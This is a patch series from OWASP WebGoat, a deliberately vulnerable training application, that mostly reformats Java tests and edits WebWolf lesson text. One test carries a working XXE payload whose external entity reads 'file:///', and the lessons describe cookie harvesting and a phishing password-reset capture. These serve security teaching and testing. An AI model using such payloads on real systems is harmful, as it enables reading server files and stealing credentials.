-                .andExpect(jsonPath("$.[*].text").value(Matchers.hasItem("Hello World")));
-    }
+    mockMvc
+        .perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.[*].text").value(Matchers.hasItem("Hello World")));
+  }
 
-    private int countComments() throws Exception {
-        var response = mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
-                .andExpect(status().isOk())
-                .andReturn();
-        return new ObjectMapper().reader().readTree(response.getResponse().getContentAsString()).size();
-    }
+  private int countComments() throws Exception {
+    var response =
+        mockMvc
+            .perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+            .andExpect(status().isOk())
+            .andReturn();
+    return new ObjectMapper().reader().readTree(response.getResponse().getContentAsString()).size();
+  }
 
-    @Test
-    public void postingInvalidJsonShouldNotAddComment() throws Exception {
-        var numberOfComments = countComments();
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/content-type")
+  @Test
+  public void postingInvalidJsonShouldNotAddComment() throws Exception {
+    var numberOfComments = countComments();
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/content-type")
                 .contentType(MediaType.APPLICATION_JSON)
                 .content("{  'text' : 'Wrong'"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
-
-        mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
-                .andExpect(status().isOk())
-                //.andDo(MockMvcResultHandlers.print())
-                .andExpect(jsonPath("$.[*]").value(Matchers.hasSize(numberOfComments)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
 
+    mockMvc
+        .perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+        .andExpect(status().isOk())
+        // .andDo(MockMvcResultHandlers.print())
+        .andExpect(jsonPath("$.[*]").value(Matchers.hasSize(numberOfComments)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/xxe/SimpleXXETest.java b/src/test/java/org/owasp/webgoat/lessons/xxe/SimpleXXETest.java
index 7c35ac049..1900d16bd 100644
--- a/src/test/java/org/owasp/webgoat/lessons/xxe/SimpleXXETest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xxe/SimpleXXETest.java
@@ -22,20 +22,19 @@
 
 package org.owasp.webgoat.lessons.xxe;
 
+import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import static org.mockito.Mockito.when;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-
 /**
  * @author nbaars
  * @since 11/2/17.
@@ -43,44 +42,61 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 @ExtendWith(SpringExtension.class)
 public class SimpleXXETest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new XXE());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new XXE());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void workingAttack() throws Exception {
-        //Call with XXE injection
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/simple")
-                .content("<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM \"file:///\"> ]><comment><text>&root;</text></comment>"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
-    }
+  @Test
+  public void workingAttack() throws Exception {
+    // Call with XXE injection
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/simple")
+                .content(
+                    "<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root"
+                        + " SYSTEM \"file:///\"> ]><comment><text>&root;</text></comment>"))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
+  }
 
-    @Test
-    public void postingJsonCommentShouldNotSolveAssignment() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/simple")
+  @Test
+  public void postingJsonCommentShouldNotSolveAssignment() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/simple")
                 .content("<comment><text>test</ext></comment>"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
+  }
 
-    @Test
-    public void postingXmlCommentWithoutXXEShouldNotSolveAssignment() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/simple")
-                .content("<?xml version=\"1.0\" standalone=\"yes\" ?><comment><text>&root;</text></comment>"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
-    }
-
-    @Test
-    public void postingPlainTextShouldShwoException() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/simple")
-                .content("test"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.output", CoreMatchers.startsWith("javax.xml.bind.UnmarshalException\\n - with linked exception")))
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
-    }
+  @Test
+  public void postingXmlCommentWithoutXXEShouldNotSolveAssignment() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/simple")
+                .content(
+                    "<?xml version=\"1.0\" standalone=\"yes\""
+                        + " ?><comment><text>&root;</text></comment>"))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
+  }
 
+  @Test
+  public void postingPlainTextShouldShwoException() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/xxe/simple").content("test"))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.output",
+                CoreMatchers.startsWith(
+                    "javax.xml.bind.UnmarshalException\\n - with linked exception")))
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/webwolf/WebWolfApplication.java b/src/test/java/org/owasp/webgoat/webwolf/WebWolfApplication.java
index ca7dd55f0..3de16b69b 100644
--- a/src/test/java/org/owasp/webgoat/webwolf/WebWolfApplication.java
+++ b/src/test/java/org/owasp/webgoat/webwolf/WebWolfApplication.java
@@ -5,6 +5,4 @@ import org.springframework.context.annotation.PropertySource;
 
 @SpringBootApplication(scanBasePackages = "org.owasp.webgoat.webwolf")
 @PropertySource("classpath:application-webwolf.properties")
-public class WebWolfApplication {
-
-}
+public class WebWolfApplication {}
diff --git a/src/test/java/org/owasp/webgoat/webwolf/jwt/JWTTokenTest.java b/src/test/java/org/owasp/webgoat/webwolf/jwt/JWTTokenTest.java
index 48a126dfc..977fa0cb5 100644
--- a/src/test/java/org/owasp/webgoat/webwolf/jwt/JWTTokenTest.java
+++ b/src/test/java/org/owasp/webgoat/webwolf/jwt/JWTTokenTest.java
@@ -1,76 +1,83 @@
 package org.owasp.webgoat.webwolf.jwt;
 
-import com.fasterxml.jackson.databind.ObjectMapper;
-import lombok.SneakyThrows;
-import org.junit.jupiter.api.Test;
-
-import java.util.Map;
-
 import static org.assertj.core.api.Assertions.assertThat;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
+import java.util.Map;
+import lombok.SneakyThrows;
+import org.junit.jupiter.api.Test;
+
 class JWTTokenTest {
 
-    @Test
-    void encodeCorrectTokenWithoutSignature() {
-        var headers = Map.of("alg", "HS256", "typ", "JWT");
-        var payload = Map.of("test", "test");
-        var token = JWTToken.encode(toString(headers), toString(payload), "");
+  @Test
+  void encodeCorrectTokenWithoutSignature() {
+    var headers = Map.of("alg", "HS256", "typ", "JWT");
+    var payload = Map.of("test", "test");
+    var token = JWTToken.encode(toString(headers), toString(payload), "");
 
-        assertThat(token.getEncoded()).isEqualTo("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoidGVzdCJ9");
-    }
+    assertThat(token.getEncoded())
+        .isEqualTo("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoidGVzdCJ9");
+  }
 
-    @Test
-    void encodeCorrectTokenWithSignature() {
-        var headers = Map.of("alg", "HS256", "typ", "JWT");
-        var payload = Map.of("test", "test");
-        var token = JWTToken.encode(toString(headers), toString(payload), "webgoat");
+  @Test
+  void encodeCorrectTokenWithSignature() {
+    var headers = Map.of("alg", "HS256", "typ", "JWT");
+    var payload = Map.of("test", "test");
+    var token = JWTToken.encode(toString(headers), toString(payload), "webgoat");
 
-        assertThat(token.getEncoded()).isEqualTo("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoidGVzdCJ9.axNp9BkswwK_YRF2URJ5P1UejQNYZbK4qYcMnkusg6I");
-    }
+    assertThat(token.getEncoded())
+        .isEqualTo(
+            "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoidGVzdCJ9.axNp9BkswwK_YRF2URJ5P1UejQNYZbK4qYcMnkusg6I");
+  }
 
-    @Test
-    void encodeTokenWithNonJsonInput() {
-        var token = JWTToken.encode("aaa", "bbb", "test");
+  @Test
+  void encodeTokenWithNonJsonInput() {
+    var token = JWTToken.encode("aaa", "bbb", "test");
 
-        assertThat(token.getEncoded()).isNullOrEmpty();
-    }
+    assertThat(token.getEncoded()).isNullOrEmpty();
+  }
 
-    @Test
-    void decodeValidSignedToken() {
-        var token = JWTToken.decode("eyJhbGciOiJIUzI1NiJ9.eyJ0ZXN0IjoidGVzdCJ9.KOobRHDYyaesV_doOk11XXGKSONwzllraAaqqM4VFE4", "test");
+  @Test
+  void decodeValidSignedToken() {
+    var token =
+        JWTToken.decode(
+            "eyJhbGciOiJIUzI1NiJ9.eyJ0ZXN0IjoidGVzdCJ9.KOobRHDYyaesV_doOk11XXGKSONwzllraAaqqM4VFE4",
+            "test");
 
-        assertThat(token.getHeader()).contains("\"alg\" : \"HS256\"");
-        assertThat(token.isSignatureValid()).isTrue();
-    }
+    assertThat(token.getHeader()).contains("\"alg\" : \"HS256\"");
+    assertThat(token.isSignatureValid()).isTrue();
+  }
 
-    @Test
-    void decodeInvalidSignedToken() {
-        var token = JWTToken.decode("eyJhbGciOiJIUzI1NiJ9.eyJ0ZXsdfdfsaasfddfasN0IjoidGVzdCJ9.KOobRHDYyaesV_doOk11XXGKSONwzllraAaqqM4VFE4", "");
+  @Test
+  void decodeInvalidSignedToken() {
+    var token =
+        JWTToken.decode(
+            "eyJhbGciOiJIUzI1NiJ9.eyJ0ZXsdfdfsaasfddfasN0IjoidGVzdCJ9.KOobRHDYyaesV_doOk11XXGKSONwzllraAaqqM4VFE4",
+            "");
 
-        assertThat(token.getHeader()).contains("\"alg\" : \"HS256\"");
-        assertThat(token.getPayload()).contains("{\"te");
-    }
+    assertThat(token.getHeader()).contains("\"alg\" : \"HS256\"");
+    assertThat(token.getPayload()).contains("{\"te");
+  }
 
-    @Test
-    void onlyEncodeWhenHeaderOrPayloadIsPresent() {
-        var token = JWTToken.encode("", "", "");
+  @Test
+  void onlyEncodeWhenHeaderOrPayloadIsPresent() {
+    var token = JWTToken.encode("", "", "");
 
-        assertThat(token.getEncoded()).isNullOrEmpty();
-    }
+    assertThat(token.getEncoded()).isNullOrEmpty();
+  }
 
-    @Test
-    void encodeAlgNone() {
-        var headers = Map.of("alg", "none");
-        var payload = Map.of("test", "test");
-        var token = JWTToken.encode(toString(headers), toString(payload), "test");
+  @Test
+  void encodeAlgNone() {
+    var headers = Map.of("alg", "none");
+    var payload = Map.of("test", "test");
+    var token = JWTToken.encode(toString(headers), toString(payload), "test");
 
-        assertThat(token.getEncoded()).isEqualTo("eyJhbGciOiJub25lIn0.eyJ0ZXN0IjoidGVzdCJ9");
-    }
-
-    @SneakyThrows
-    private String toString(Map<String, String> map) {
-        var mapper = new ObjectMapper();
-        return mapper.writeValueAsString(map);
-    }
+    assertThat(token.getEncoded()).isEqualTo("eyJhbGciOiJub25lIn0.eyJ0ZXN0IjoidGVzdCJ9");
+  }
 
+  @SneakyThrows
+  private String toString(Map<String, String> map) {
+    var mapper = new ObjectMapper();
+    return mapper.writeValueAsString(map);
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxControllerTest.java b/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxControllerTest.java
index 6e1135fb6..aa0c3c5de 100644
--- a/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxControllerTest.java
+++ b/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxControllerTest.java
@@ -22,9 +22,19 @@
 
 package org.owasp.webgoat.webwolf.mailbox;
 
+import static org.hamcrest.CoreMatchers.containsString;
+import static org.hamcrest.CoreMatchers.not;
+import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get;
+import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.content;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.view;
+
 import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import com.google.common.collect.Lists;
+import java.time.LocalDateTime;
+import java.time.format.DateTimeFormatter;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.mockito.Mockito;
@@ -36,87 +46,85 @@ import org.springframework.http.MediaType;
 import org.springframework.security.test.context.support.WithMockUser;
 import org.springframework.test.web.servlet.MockMvc;
 
-import java.time.LocalDateTime;
-import java.time.format.DateTimeFormatter;
-
-import static org.hamcrest.CoreMatchers.containsString;
-import static org.hamcrest.CoreMatchers.not;
-import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get;
-import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.content;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.view;
-
 @WebMvcTest(MailboxController.class)
 public class MailboxControllerTest {
 
-    @Autowired
-    private MockMvc mvc;
-    @MockBean
-    private MailboxRepository mailbox;
-    @MockBean
-    private UserService userService;
-    @Autowired
-    private ObjectMapper objectMapper;
+  @Autowired private MockMvc mvc;
+  @MockBean private MailboxRepository mailbox;
+  @MockBean private UserService userService;
+  @Autowired private ObjectMapper objectMapper;
 
-    @JsonIgnoreProperties("time")
-    public static class EmailMixIn {
-    }
+  @JsonIgnoreProperties("time")
+  public static class EmailMixIn {}
 
-    @BeforeEach
-    public void setup() {
-        objectMapper.addMixIn(Email.class, EmailMixIn.class);
-    }
+  @BeforeEach
+  public void setup() {
+    objectMapper.addMixIn(Email.class, EmailMixIn.class);
+  }
 
-    @Test
-    @WithMockUser
-    public void sendingMailShouldStoreIt() throws Exception {
-        Email email = Email.builder()
-                .contents("This is a test mail")
-                .recipient("test1234@webgoat.org")
-                .sender("hacker@webgoat.org")
-                .title("Click this mail")
-                .time(LocalDateTime.now())
-                .build();
-        this.mvc.perform(post("/mail").contentType(MediaType.APPLICATION_JSON).content(objectMapper.writeValueAsBytes(email)))
-                .andExpect(status().isCreated());
-    }
+  @Test
+  @WithMockUser
+  public void sendingMailShouldStoreIt() throws Exception {
+    Email email =
+        Email.builder()
+            .contents("This is a test mail")
+            .recipient("test1234@webgoat.org")
+            .sender("hacker@webgoat.org")
+            .title("Click this mail")
+            .time(LocalDateTime.now())
+            .build();
+    this.mvc
+        .perform(
+            post("/mail")
+                .contentType(MediaType.APPLICATION_JSON)
+                .content(objectMapper.writeValueAsBytes(email)))
+        .andExpect(status().isCreated());
+  }
 
-    @Test
-    @WithMockUser(username = "test1234")
-    public void userShouldBeAbleToReadOwnEmail() throws Exception {
-        Email email = Email.builder()
-                .contents("This is a test mail")
-                .recipient("test1234@webgoat.org")
-                .sender("hacker@webgoat.org")
-                .title("Click this mail")
-                .time(LocalDateTime.now())
-                .build();
-        Mockito.when(mailbox.findByRecipientOrderByTimeDesc("test1234")).thenReturn(Lists.newArrayList(email));
+  @Test
+  @WithMockUser(username = "test1234")
+  public void userShouldBeAbleToReadOwnEmail() throws Exception {
+    Email email =
+        Email.builder()
+            .contents("This is a test mail")
+            .recipient("test1234@webgoat.org")
+            .sender("hacker@webgoat.org")
+            .title("Click this mail")
+            .time(LocalDateTime.now())
+            .build();
+    Mockito.when(mailbox.findByRecipientOrderByTimeDesc("test1234"))
+        .thenReturn(Lists.newArrayList(email));
 
-        this.mvc.perform(get("/mail"))
-                .andExpect(status().isOk())
-                .andExpect(view().name("mailbox"))
-                .andExpect(content().string(containsString("Click this mail")))
-                .andExpect(content().string(containsString(DateTimeFormatter.ofPattern("h:mm a").format(email.getTimestamp()))));
-    }
+    this.mvc
+        .perform(get("/mail"))
+        .andExpect(status().isOk())
+        .andExpect(view().name("mailbox"))
+        .andExpect(content().string(containsString("Click this mail")))
+        .andExpect(
+            content()
+                .string(
+                    containsString(
+                        DateTimeFormatter.ofPattern("h:mm a").format(email.getTimestamp()))));
+  }
 
-    @Test
-    @WithMockUser(username = "test1233")
-    public void differentUserShouldNotBeAbleToReadOwnEmail() throws Exception {
-        Email email = Email.builder()
-                .contents("This is a test mail")
-                .recipient("test1234@webgoat.org")
-                .sender("hacker@webgoat.org")
-                .title("Click this mail")
-                .time(LocalDateTime.now())
-                .build();
-        Mockito.when(mailbox.findByRecipientOrderByTimeDesc("test1234")).thenReturn(Lists.newArrayList(email));
-
-        this.mvc.perform(get("/mail"))
-                .andExpect(status().isOk())
-                .andExpect(view().name("mailbox"))
-                .andExpect(content().string(not(containsString("Click this mail"))));
-    }
+  @Test
+  @WithMockUser(username = "test1233")
+  public void differentUserShouldNotBeAbleToReadOwnEmail() throws Exception {
+    Email email =
+        Email.builder()
+            .contents("This is a test mail")
+            .recipient("test1234@webgoat.org")
+            .sender("hacker@webgoat.org")
+            .title("Click this mail")
+            .time(LocalDateTime.now())
+            .build();
+    Mockito.when(mailbox.findByRecipientOrderByTimeDesc("test1234"))
+        .thenReturn(Lists.newArrayList(email));
 
+    this.mvc
+        .perform(get("/mail"))
+        .andExpect(status().isOk())
+        .andExpect(view().name("mailbox"))
+        .andExpect(content().string(not(containsString("Click this mail"))));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepositoryTest.java b/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepositoryTest.java
index 6e293779b..9f2b65ac0 100644
--- a/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepositoryTest.java
+++ b/src/test/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepositoryTest.java
@@ -22,45 +22,42 @@
 
 package org.owasp.webgoat.webwolf.mailbox;
 
+import static org.junit.jupiter.api.Assertions.assertEquals;
+
+import java.time.LocalDateTime;
+import java.util.List;
 import org.junit.jupiter.api.Test;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.boot.test.autoconfigure.orm.jpa.DataJpaTest;
 
-import java.time.LocalDateTime;
-import java.util.List;
-
-import static org.junit.jupiter.api.Assertions.assertEquals;
-
 @DataJpaTest
 public class MailboxRepositoryTest {
 
-    @Autowired
-    private MailboxRepository mailboxRepository;
+  @Autowired private MailboxRepository mailboxRepository;
 
-    @Test
-    void emailShouldBeSaved() {
-        Email email = new Email();
-        email.setTime(LocalDateTime.now());
-        email.setTitle("test");
-        email.setSender("test@test.com");
-        email.setContents("test");
-        email.setRecipient("someone@webwolf.org");
-        mailboxRepository.save(email);
-    }
+  @Test
+  void emailShouldBeSaved() {
+    Email email = new Email();
+    email.setTime(LocalDateTime.now());
+    email.setTitle("test");
+    email.setSender("test@test.com");
+    email.setContents("test");
+    email.setRecipient("someone@webwolf.org");
+    mailboxRepository.save(email);
+  }
 
-    @Test
-    void savedEmailShouldBeFoundByReceipient() {
-        Email email = new Email();
-        email.setTime(LocalDateTime.now());
-        email.setTitle("test");
-        email.setSender("test@test.com");
-        email.setContents("test");
-        email.setRecipient("someone@webwolf.org");
-        mailboxRepository.saveAndFlush(email);
+  @Test
+  void savedEmailShouldBeFoundByReceipient() {
+    Email email = new Email();
+    email.setTime(LocalDateTime.now());
+    email.setTitle("test");
+    email.setSender("test@test.com");
+    email.setContents("test");
+    email.setRecipient("someone@webwolf.org");
+    mailboxRepository.saveAndFlush(email);
 
-        List<Email> emails = mailboxRepository.findByRecipientOrderByTimeDesc("someone@webwolf.org");
-
-        assertEquals(emails.size(), 1);
-    }
+    List<Email> emails = mailboxRepository.findByRecipientOrderByTimeDesc("someone@webwolf.org");
 
+    assertEquals(emails.size(), 1);
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/webwolf/user/UserServiceTest.java b/src/test/java/org/owasp/webgoat/webwolf/user/UserServiceTest.java
index a9049f482..b81dc759f 100644
--- a/src/test/java/org/owasp/webgoat/webwolf/user/UserServiceTest.java
+++ b/src/test/java/org/owasp/webgoat/webwolf/user/UserServiceTest.java
@@ -39,41 +39,39 @@ import org.springframework.security.core.userdetails.UsernameNotFoundException;
 @ExtendWith(MockitoExtension.class)
 public class UserServiceTest {
 
-    @Mock
-    private UserRepository mockUserRepository;
+  @Mock private UserRepository mockUserRepository;
 
-    @InjectMocks
-    private UserService sut;
+  @InjectMocks private UserService sut;
 
-    @Test
-    public void testLoadUserByUsername(){
-        var username = "guest";
-        var password = "123";
-        WebGoatUser user = new WebGoatUser(username, password);
-        when(mockUserRepository.findByUsername(username)).thenReturn(user);
+  @Test
+  public void testLoadUserByUsername() {
+    var username = "guest";
+    var password = "123";
+    WebGoatUser user = new WebGoatUser(username, password);
+    when(mockUserRepository.findByUsername(username)).thenReturn(user);
 
-        var webGoatUser = sut.loadUserByUsername(username);
+    var webGoatUser = sut.loadUserByUsername(username);
 
-        Assertions.assertThat(username).isEqualTo(webGoatUser.getUsername());
-        Assertions.assertThat(password).isEqualTo(webGoatUser.getPassword());
-    }
+    Assertions.assertThat(username).isEqualTo(webGoatUser.getUsername());
+    Assertions.assertThat(password).isEqualTo(webGoatUser.getPassword());
+  }
 
-    @Test
-    public void testLoadUserByUsername_NULL(){
-        var username = "guest";
-        
-        when(mockUserRepository.findByUsername(username)).thenReturn(null);
+  @Test
+  public void testLoadUserByUsername_NULL() {
+    var username = "guest";
 
-        assertThrows(UsernameNotFoundException.class, ()->sut.loadUserByUsername(username));
-    }
+    when(mockUserRepository.findByUsername(username)).thenReturn(null);
 
-    @Test
-    public void testAddUser(){
-        var username = "guest";
-        var password = "guest";
+    assertThrows(UsernameNotFoundException.class, () -> sut.loadUserByUsername(username));
+  }
 
-        sut.addUser(username, password);
+  @Test
+  public void testAddUser() {
+    var username = "guest";
+    var password = "guest";
 
-        verify(mockUserRepository, times(1)).save(any(WebGoatUser.class));
-    }
+    sut.addUser(username, password);
+
+    verify(mockUserRepository, times(1)).save(any(WebGoatUser.class));
+  }
 }

From 966659716453a24d9bccc8c811a8120652d1fefc Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 3 Jan 2023 08:19:51 +0100
Subject: [PATCH 216/227] - Add reference to the WebWolf icon in the top right
 corner. - Format all text of the lesson

---
 .../documentation/IntroductionWebWolf.adoc      | 17 +++++++++--------
 .../documentation/Landing_page.adoc             | 13 ++++++-------
 .../documentation/Receiving_mail.adoc           |  8 ++++----
 .../documentation/Uploading_files.adoc          |  8 ++++----
 4 files changed, 23 insertions(+), 23 deletions(-)

diff --git a/src/main/resources/lessons/webwolfintroduction/documentation/IntroductionWebWolf.adoc b/src/main/resources/lessons/webwolfintroduction/documentation/IntroductionWebWolf.adoc
index 94f85602e..fe54d2789 100644
--- a/src/main/resources/lessons/webwolfintroduction/documentation/IntroductionWebWolf.adoc
+++ b/src/main/resources/lessons/webwolfintroduction/documentation/IntroductionWebWolf.adoc
@@ -1,7 +1,7 @@
 == Introducing WebWolf
 
-You only need WebWolf if a lesson specifies you can use it. For a lot of lessons you use WebGoat without
-using WebWolf. Lessons where you can use WebWolf are marked with the following icon (top right in assignment):
+You only need WebWolf if a lesson specifies that you can use it. For many lessons, you use WebGoat without
+using WebWolf. Lessons where you can use WebWolf, are marked with the following icon (top right in the assignment):
 
 {nbsp}
 
@@ -9,16 +9,17 @@ image::images/wolf-enabled.png[width=115,height=128]
 
 {nbsp}
 
-Even if the icon is present, you are not obliged to use WebWolf, you can also use any intercepting tool you like.
+Even if the icon is present, you are not obliged to use WebWolf. You can also use any intercepting tool you like.
 (`netcat` etc.)
 
-WebWolf opens in a new browser tab and is a separate web application which simulates an attacker's machine. It makes it possible for us to
-make a clear distinction between what takes place on the attacked website and the actions you need to do as
-an "attacker". WebWolf was introduced after a couple of workshops where we received feedback that there
+You can always open WebWolf by clicking the icon in the top right corner.
+
+WebWolf opens in a new browser tab and is a separate web application that simulates an attacker's machine. It makes it possible for us to
+distinguish between what takes place on the attacked website and what actions you need to take as
+an "attacker." The idea for WebWolf came about after a couple of workshops where we received feedback that there
 was no clear distinction between what was part of the "attackers" role and what was part of the "users" role on the
-website. The following items are supported in WebWolf:
+website. WebWolf supports the following functionality:
 
 * Hosting a file
 * Receiving email
 * Landing page for incoming requests
-
diff --git a/src/main/resources/lessons/webwolfintroduction/documentation/Landing_page.adoc b/src/main/resources/lessons/webwolfintroduction/documentation/Landing_page.adoc
index 9a4099391..70948deaa 100644
--- a/src/main/resources/lessons/webwolfintroduction/documentation/Landing_page.adoc
+++ b/src/main/resources/lessons/webwolfintroduction/documentation/Landing_page.adoc
@@ -1,8 +1,8 @@
 == Landing page
 
 This page will show all the requests made to '/landing/**'. This means
-you can use WebWolf as your landing page for harvesting cookies etc which
-is helpful when you perform a XSS lesson.
+you can use WebWolf as your landing page for harvesting cookies etc. which
+is helpful when you perform an XSS lesson.
 
 image::images/requests.png[caption="Figure: ", style="lesson-image"]
 
@@ -10,16 +10,15 @@ image::images/requests.png[caption="Figure: ", style="lesson-image"]
 {nbsp}
 {nbsp}
 
-*For this exercise you need to login to WebWolf first.*
+*For this exercise, you need to log in to WebWolf first.*
 
 {nbsp}
 {nbsp}
 
-Suppose we tricked a user to click on a link he/she received in an email, this link will open up our crafted
+Suppose we tricked a user into clicking on a link he/she received in an email. This link will open up our crafted
 password reset link page. The user does not notice any differences compared to the normal password reset page of the company.
-The user enters a new password and hits enter. The new password will be sent to your host. In this case the new
+The user enters a new password and hits enter. The new password will be sent to your host. In this case, the new
 password will be sent to WebWolf. Try to locate the unique code.
 
-Please be aware that after resetting the password the user will receive an error page. In a real attack scenario the
-user would probably see a normal success page (this is due to a limit what we can control with WebWolf)
+Please be aware that the user will receive an error page after resetting the password. In a real attack scenario the user would probably see a normal success page (this is due to a limit on what we can control with WebWolf)
 
diff --git a/src/main/resources/lessons/webwolfintroduction/documentation/Receiving_mail.adoc b/src/main/resources/lessons/webwolfintroduction/documentation/Receiving_mail.adoc
index 5236be646..f5f88be35 100644
--- a/src/main/resources/lessons/webwolfintroduction/documentation/Receiving_mail.adoc
+++ b/src/main/resources/lessons/webwolfintroduction/documentation/Receiving_mail.adoc
@@ -1,7 +1,7 @@
-== Your own mailbox
+== Your mailbox
 
-WebWolf offers a mail client which will contain the e-mail sent during a lesson.
-This mailbox is user specific so each user has a separate mailbox. All e-mail
+WebWolf offers a mail client containing the e-mail sent during a lesson.
+This mailbox is user-specific, so each user has a separate mailbox. All e-mail
 sent to {user}@.... will end up in this inbox.
 
 {nbsp}
@@ -14,5 +14,5 @@ image::images/mailbox.png[caption="Figure: ", style="lesson-image"]
 {nbsp}
 {nbsp}
 
-Try it, type in your e-mail address below and check your inbox in
+Try it; type in your e-mail address below and check your inbox in
 WebWolf. Then type in the unique code from the e-mail in the field below.
diff --git a/src/main/resources/lessons/webwolfintroduction/documentation/Uploading_files.adoc b/src/main/resources/lessons/webwolfintroduction/documentation/Uploading_files.adoc
index 2ccda9d92..dae40da76 100644
--- a/src/main/resources/lessons/webwolfintroduction/documentation/Uploading_files.adoc
+++ b/src/main/resources/lessons/webwolfintroduction/documentation/Uploading_files.adoc
@@ -1,12 +1,12 @@
 == Uploading files
 
-In this section you can upload files. These files will be available from outside
-the application. For example if you want to reference a DTD which you
-reference from an xml in an XXE attack, you can use WebWolf to serve this DTD.
+In this section, you can upload files. These files will be available from outside
+the application. For example, if you want to reference a DTD that you
+reference from an XML in an XXE attack, you can use WebWolf to serve this DTD.
 
